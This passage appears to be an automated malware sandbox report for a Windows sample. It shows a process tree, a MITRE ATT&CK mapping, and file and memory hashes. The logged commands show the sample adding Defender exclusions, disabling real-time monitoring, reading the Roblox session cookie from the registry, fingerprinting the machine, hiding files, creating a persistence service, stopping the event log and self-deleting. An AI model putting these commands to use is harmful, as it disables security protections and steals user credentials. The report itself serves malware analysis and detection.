    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svchost.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:984
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2124
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 2736 -s 1660
    3⤵
    PID:1312
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WaveHelper.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2820
- C:\Windows\System32\WaveHelper.exe
  "C:\Windows\System32\WaveHelper.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2768
- - C:\Windows\System32\attrib.exe
    "attrib.exe" +h +s "C:\Windows\System32\WaveHelper.exe"
    3⤵
    - Drops file in System32 directory
    - Views/modifies file attributes
    PID:1780
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Windows\System32\WaveHelper.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2104
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2800
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1628
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:864
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2716
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2388
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:2364
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2160
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:2760
- - C:\Windows\System32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Windows\System32\WaveHelper.exe" && pause
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:2864
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:1672
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WaveInstaller.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2644
- C:\Windows\System32\WaveInstaller.exe
  "C:\Windows\System32\WaveInstaller.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2660
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=WaveInstaller.exe&platform=0009&osver=5&isServer=0&shimver=4.0.30319.0
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:656
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:656 CREDAT:275457 /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:1048
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WaveUpdateer.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2388
- C:\Windows\System32\WaveUpdateer.exe
  "C:\Windows\System32\WaveUpdateer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:2912
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:1372
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:1340
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:2640
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:2072
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "XLZQHCLS"
    3⤵
    - Launches sc.exe
    PID:1728
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "XLZQHCLS" binpath= "C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:700
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:1592
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "XLZQHCLS"
    3⤵
    - Launches sc.exe
    PID:1620

C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe
C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:1776
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:1792
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:2924
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:2108
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:752
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:268
- C:\Windows\system32\conhost.exe
  conhost.exe
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2088

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6B2043001D270792DFFD725518EAFE2C

Filesize
579B

MD5
f55da450a5fb287e1e0f0dcc965756ca

SHA1
7e04de896a3e666d00e687d33ffad93be83d349e

SHA256
31ad6648f8104138c738f39ea4320133393e3a18cc02296ef97c2ac9ef6731d0

SHA512
19bd9a319dfdaad7c13a6b085e51c67c0f9cb1eb4babc4c2b5cdf921c13002ca324e62dfa05f344e340d0d100aa4d6fac0683552162ccc7c0321a8d146da0630

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6B2043001D270792DFFD725518EAFE2C

Filesize
252B

MD5
8223ca7ce985a30a810527f2e8fc025c

SHA1
f228bf13c15da5e120ded213cae8a02d26427712

SHA256
fb24abf51762aeed3a748d5def59c5d6718743ede73e216566cdcdc9854c154c

SHA512
92816ed253370c793eb66b7f7bcd84527f091b36a4c32b07c3bf49e1e8db860339345e5fb06beebf01f45c3c4ca172e4ed8aec2c5246091b4bdc2febaeb54534

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
e429ab526d0b4bbea1097481a0169fb8

SHA1
9eafea0572fca2acf746dd5b644b204cb1d02efa

SHA256
76fc1326ed673fcc0f44e9f0d14baf34398500dbaa4f67b8c9e0338856a304d0

SHA512
245736504ed578ede74aef2b285f481220b24bf4356ea1105264fcf38df707a185bdef8a3e8ad073ca69582857c8b94972cdc852e1ab2d91b546d244b2685f2c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
18a782e33c217f8f7b3263c43d4566f1

SHA1
4acf395d0ac80a6a6ed21292ec3e8c0d37991970

SHA256
8f7e74cb191603115f56a4ad0796a30ae08a4d229fc680a44e8e1cff06842e13

SHA512
5a4771468b18ba334c85efc5a868c3929f091077f0c19cbfadad41791209c5ac0fa479f98161c34270b48125a6b5818cab50c06b2138cf9d0b34811b2e5ae848

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
f32fd96831391c3a69fde6a37331954d

SHA1
aab2f4fc0f682fc427dc36c108b4e9de1a7b4642

SHA256
f676560db59c2bb3119708f77ebf5d28a6409224e32013c1339e9899a313d46e

SHA512
e16f5f787a539558c6d8d60f05d4bdded1e8e21dcd113c52fe7b3295d25c1b2d3a5dcb7b91d433a872fb32956f837b604aef7ae4d34a57ff6bac73875045346e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
45680b7e054dd1f0b6db9733fd7283e8

SHA1
f7ed790be549ced16046c0db77a7adfe0abd6080

SHA256
52a474bbbf6e3001dc91c6fc6c42ffdb8f4fc305e28a4a611c18fbb09ca31d31

SHA512
4d0bd94a089fd1f8b79af894a9d636b336e9efa30e18e04eb1a543264c27b479ebbcc70c49f4081858199c2fc6b158b5958ea7ef79510a82cd384c5aeeb383e3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
4c8afc2611bdfc17e459cfc746618a08

SHA1
ad126967d55366f3bb3ff237a6638968b9bd1912

SHA256
a7dec21e6372255d21b933bb24c049ea5dd36764c972e632b7979ba0fbffaf4e

SHA512
6fe1fbe7483c8750d4b7b9a5810a427ac3ea41122be451616347db0488c462c67c62415f89db205d53229acf42488cf6356ce0e73459f01c2ec0ef1d1b26754b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
7e564f04ffc0e378a362af42a3e7681d

SHA1
e810bc6b637140b7c4651761fee265e91bc98417

SHA256
a143275671b1f5760430121882a8371081890baa30d900925fb9780db064baa1

SHA512
35d3a11a39a514174de7a6c0056b6e1c545ff6cc3ca39570ed7288442cade280e6f32d16065ed41ca8ef7aa035303cdaafa06b82a91f43eaea8b64a9be12570d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
5300da4b9196a1cf36ddb72567386726

SHA1
8bb733a604d663ed9904ec0340dea7223860fb8f

SHA256
8383eb7f7711a2df47372a7a17706c2e59495197f3de9247641186421841bb9c

SHA512
35eeaf5f7ccaebb2e472796b878bcc306aff2105e3ee7ea2764bdddc0ea4117eb0b7d2d176e44c4bdddd0f154585708b5798805d03778881e604b3f0773ffab4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
b507b748bec8e93ea9be16fd32a05d9c

SHA1
b94b3d6f303981b5f9639648b15e2a3395ea349a

SHA256
1889ee6eaf5fea1e98d193af73b52358d874423419f105b33c7b43291547ce69

SHA512
be26b58752a7b3c20e97dcd0a3468e8496d7231ec7808ce78c23c07fa61ed6d513933227baaabd9a05c7e68158d05101854792dba8b7918ba9f0b5b56006cc2c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
760e70104e8fabb7a063e509a3214ab8

SHA1
a0a133f7af0b7509a7caa3a7b4af208c62f35df5

SHA256
3e4ba79dddd05becada967a3c7b1b26ab33a8e50622e5e492d95897da5f6e719

SHA512
24c6741dfb43c9067d628acff56684338499eaee31716dc35a9282a8b94f1b2bfa795af92b31d255354f7cc5a89a30439bcf05858154dd853ea93f2956a7e834

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
a44f1cfadba5059a274fe5c1c1b1e1f7

SHA1
d3417fd9cc8ebfab91f8beda67b3c5c8d62767ec

SHA256
dc6f3df707df50efd1426bf9555eeb0d6f39fc7b70053ca329c1d37a966663aa

SHA512
e2d3d224415a707edc4f19c9f0a51edd78aa51aa5b64767168018c7118633aa9e0d4a7a7ba45324fdde637a03511ac3e804fc4c23b80fc5136b0ef780abc4ead

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
4e03adaf73f8e9e56608e057dc4493e6

SHA1
f0b72ead40cb50804533d7b97d90e05038c0d664

SHA256
1e9d7dfd4bd48c88e9078f185e80c8cec840cefab3413dd570f496bf2daef6d6

SHA512
861ec6bc58ff19df5be4ad89bb1017b880fcb49304439c84faaaac1892d60420d93c8c0a56baa8385a96e9e54ae34daa68cba902616833dc7e67675476abfeaa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
73f5683441dd8fc852807c6bf27c89fb

SHA1
edcdc026bd9ef987a5e8839b15a08d0447b52f2e

SHA256
0025c09dff47f0c389791f3bb6a7571142dec0ae47d62e81280f663687d4e4c6

SHA512
c55be7cdf0bee6b052a510434e9c4b8ad6140218b43b09195379d906a6a6b550408cfda137e8d6bb509462d14628bdbfdfadd16e9fe97fc9b2d7a692e8c0a6cd

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
01db38060fe5532579ada09ed1d03c41

SHA1
0c8a54585bf6d005c06ce06911a836f1ed8dbb5c

SHA256
1cb41992e3d766c9bf13f7fad4f5dbba6b92f7581fb097c9714a2d0580aa4bac

SHA512
79b1173607a8e4c2e31dc06e77ee3cf99121c2cc09afd90cf4d828d15503d775d9ff68d9c8d42c6125ac9666f3f41e7784e71f98673318261bb2d93485e2ce5b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
ac13cc841a1045ecb36219e11e7f2f87

SHA1
c26eebf70aa85a4b44ac966cc563f6414df00328

SHA256
60c56693a30806541272d8cd2327d180c6d2f5aa9609a187f67b5f09411dc001

SHA512
5f9ac65432033927defb252f569c14247dc9a9b47ac0b81b1f0a0c9211cafa9c81be1b17bd22f7cd259a5b125343c3dff98ce624b6b8114084321ba3abef7296

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
4679d01c1e56255bba4e286218108493

SHA1
efa0509fa798be9b9b44c5fcb9afe35c441ec635

SHA256
589e8984388c39c7b809352c9f3be4d626ff589df5a8d640b002f35acec4ac10

SHA512
d16d7cca1529d527138a3e475782e2a5af4e4e1eaa004dae7c8db31278b8319bce3878b3d0cffd98e40913f0eebe4b19c2b95363d0c348ece98c8bbad89c71c5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
307d7861872402779426823dcef49f0c

SHA1
1886e731087370103c462b7e9ed54c6f15239f5b

SHA256
41c024d26eb4880ed0c9db0ee854fd15177e3daa43b223f76525e88ed84e0697

SHA512
3d90d8264019cd2acb59ebd1cabca9b0d78624e14d2f49051df125f8bcbbb2661324d2f7043518a95139d7c3c2a468c4da2e709c65c7558308728ac078fc208a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
9cc06d6fde57dc30584b3659ed9d407e

SHA1
16f76e48dfbea7a75f9d6b9bf86f24a263e74334

SHA256
d5ae90dbb4740b1ebb07982aae59656e8ecb37f3e898d35feb1bde0e93fb698d

SHA512
aaf8e03672ee8551554205da737f591e052eb40efeb9c3c6156356a7e94b39ad9d43679d5907c73dcde72d95482c68877ad5dfb2bd155a62cd69520c803cf3d7

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
d897dccb1ec47879510bc3f532c072fd

SHA1
9f6abc6794bdd1a051878362a2a43e1bf03203f0

SHA256
81ad26135591b49df754a9d919569d9fa538af680a2d89a7dd93dd66b6fc7154

SHA512
1eaa0dc991ca01bf6340ade0b6ba195c5fa5a21a764768eace439a12fcbd205ecc9499b8e35a499da292260113793e641978f8d302a012a6bfe3dea8853b9827

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
3f17c35c248c5b86bab22a1659306582

SHA1
ad1a8da89ee631b9cad93f91629a52dde2c71de0

SHA256
1c2e0ece2bcc1a9c817e463ee1e37ad7ba1da7d83235569db92581dba13484ce

SHA512
af4939ca97fa24f5f0379f6d6a5246ffe89f75815dc76c4ceac37588b1d1aff3f208ec7f6f46b26f82c00c19b6099288c6e8d53cc5cd3793595790993cde7f29

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabD3E4.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarD4A2.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
404af02db511822728e62a6cec5bfe50

SHA1
e40efd1a6aa54c9ba105bec4322dabae1e5c5240

SHA256
2750b22fd3774e9ee2a1fe0bd20ea845bcd74901770a9d16e0e6c01064dc7526

SHA512
57cd2c88076a608a0d8117e3d712b9c94c2b14be9af1865e7278fc6b849149677c770a8463885209c05009e0069e60c6ff232d42fc7e491942ea5f145945de62

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
7ed388e96d7e6f2286fc5fe2dd251b3a

SHA1
5f9b947c91a1aa9b9bb6eae783c6cb90438ebd46

SHA256
49aae1703609050a9d3ff2c4ac472a60b80f861027c044024190744b04e6a180

SHA512
e266d590df038424c9cb4df6a44e5f9c7a531721aca9bec71b1fb1cd81f65c8472177f0fa92644af7fe951e467d0df2c8e965cbb54abcac7d09da78adf9beacb

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
752e7ce7143875d817864eeacf7ecfa9

SHA1
139b19e4a3223b4ac2291cb707c1a1618cecf172

SHA256
b681735326fef39102e42de58636e5c95cf9764ea7d9dedde9b7e3787edee9fa

SHA512
8b86beab29a4fc863b67f23b79c6ed6dab45f7ab8393102ae2da6f49700e623c20176d354d6259b6e2ab659b46cffa3072780bab00031d46065d85c576aaef93

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\J5DZTLJCSXGB5IZR0OY4.temp

Filesize
7KB

MD5
ae02bd6f3cee3268d97cebf6c423b563

SHA1
44e1c924c1cd3daa308da2d6e67ef2f66da1b441

SHA256
ade9d33c2faf6ed56b700fcd919d9de3f5ddb4d831e69e5cf3d398d2e89b0284

SHA512
8d403b4c981f2b66334273c3b4da56e9a3fc9b7282b7725af9fcb9d7490f5ee9b6017165ca03d34c2ebd16a624983387675e838971ba9f6bc2082a2b948ff498

Download Submit
C:\Windows\System32\WaveHelper.exe

Filesize
231KB

MD5
0c2b03e1f32b2d17d55032b3496c19f1

SHA1
78720161454f26b699050c6182e2cea65a1d9f8d

SHA256
65f6368ad8accbb7e5427d6e1c85cbf35508f48d82d10fba9a9672be9665e33c

SHA512
d79db4a54e501bae04c52ce3f9cc32fe11c45a7866a34f8c4f6e4555b12fbdcc48bc33e465033dce415d152ca9089895b396a8904317dd232ed3539024f7c939

Download Submit
C:\Windows\System32\WaveInstaller.exe

Filesize
2.3MB

MD5
215d509bc217f7878270c161763b471e

SHA1
bfe0a2580d54cfa28d3ff5ef8dc754fdc73adcd9

SHA256
984dfc64c10f96c5350d6d9216a5d7abfece1658dfc93925f7a6b0c80817c886

SHA512
68e615dfcb1b7770ad64175438a913744c14bdd3af93b339c2b526271bdd0d23334e78d049fdae8ca9fe66672a8cf252ebf891be9ab6c46a3d8f1fb00fa8c83b

Download Submit
C:\Windows\System32\Wavee.exe

Filesize
806KB

MD5
03cd8af54071d83e6c1c8cfcc62991df

SHA1
e5ed48a8ebe6241bf09fcb44d9999150aa583c00

SHA256
c28915a79540f3d3c0f0c5a6fdbc222fb44256d78569806471855646df7c3670

SHA512
24611b7a3f87d942078789bbc16b73e6827ec1b8b5bb21677c4e6b697b858c0a4c5edcd34268cdd67efa38348e13a2ec8618a36db69f27a1b62f7260c2c38a40

Download Submit
\Windows\System32\WaveUpdateer.exe

Filesize
5.0MB

MD5
bf5bf424a2ce7ffe39d36b71edda3a21

SHA1
4002f1a7cce049e3d4de64bf9ecc8424763704c0

SHA256
de7db874238650f46e8ccc96f5e7cd6430c84ecafdc810ece0cc8e253a147038

SHA512
62e6493ad139eea4461027664e7cfbb0d6b96c92e69f1b103c73b42aa3ff3ef1a4cea5f5dec1cef8a74a7db3410c6a3cefcd3eb14e4861b829f8beba05f6e026

Download Submit
memory/268-596-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/268-601-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/268-592-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/268-593-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/268-594-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/268-595-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/864-91-0x0000000001F50000-0x0000000001F58000-memory.dmp

Filesize
32KB

Download
memory/984-297-0x000000001B630000-0x000000001B912000-memory.dmp

Filesize
2.9MB

Download
memory/984-307-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download
memory/1784-6-0x0000000002E10000-0x0000000002E90000-memory.dmp

Filesize
512KB

Download
memory/1784-7-0x000000001B560000-0x000000001B842000-memory.dmp

Filesize
2.9MB

Download
memory/1784-8-0x00000000023C0000-0x00000000023C8000-memory.dmp

Filesize
32KB

Download
memory/1924-133-0x0000000001DA0000-0x0000000001DA8000-memory.dmp

Filesize
32KB

Download
memory/1924-123-0x000000001B860000-0x000000001BB42000-memory.dmp

Filesize
2.9MB

Download
memory/2088-612-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2088-605-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2088-599-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2088-608-0x00000000001C0000-0x00000000001E0000-memory.dmp

Filesize
128KB

Download
memory/2088-607-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2088-609-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2088-613-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2088-600-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2088-838-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2088-611-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2088-610-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2088-606-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2088-604-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2088-603-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2088-837-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2104-63-0x000000001B620000-0x000000001B902000-memory.dmp

Filesize
2.9MB

Download
memory/2104-64-0x00000000027E0000-0x00000000027E8000-memory.dmp

Filesize
32KB

Download
memory/2384-0-0x000007FEF51F3000-0x000007FEF51F4000-memory.dmp

Filesize
4KB

Download
memory/2384-1-0x0000000000A70000-0x000000000110A000-memory.dmp

Filesize
6.6MB

Download
memory/2388-48-0x0000000001F40000-0x0000000001F48000-memory.dmp

Filesize
32KB

Download
memory/2388-47-0x000000001B680000-0x000000001B962000-memory.dmp

Filesize
2.9MB

Download
memory/2736-15-0x00000000011A0000-0x000000000126E000-memory.dmp

Filesize
824KB

Download
memory/2768-29-0x0000000001070000-0x00000000010B0000-memory.dmp

Filesize
256KB

Download
memory/2800-70-0x000000001B680000-0x000000001B962000-memory.dmp

Filesize
2.9MB

Download
memory/2800-71-0x0000000001D90000-0x0000000001D98000-memory.dmp

Filesize
32KB

Download
memory/2820-22-0x0000000001FC0000-0x0000000001FC8000-memory.dmp

Filesize
32KB

Download
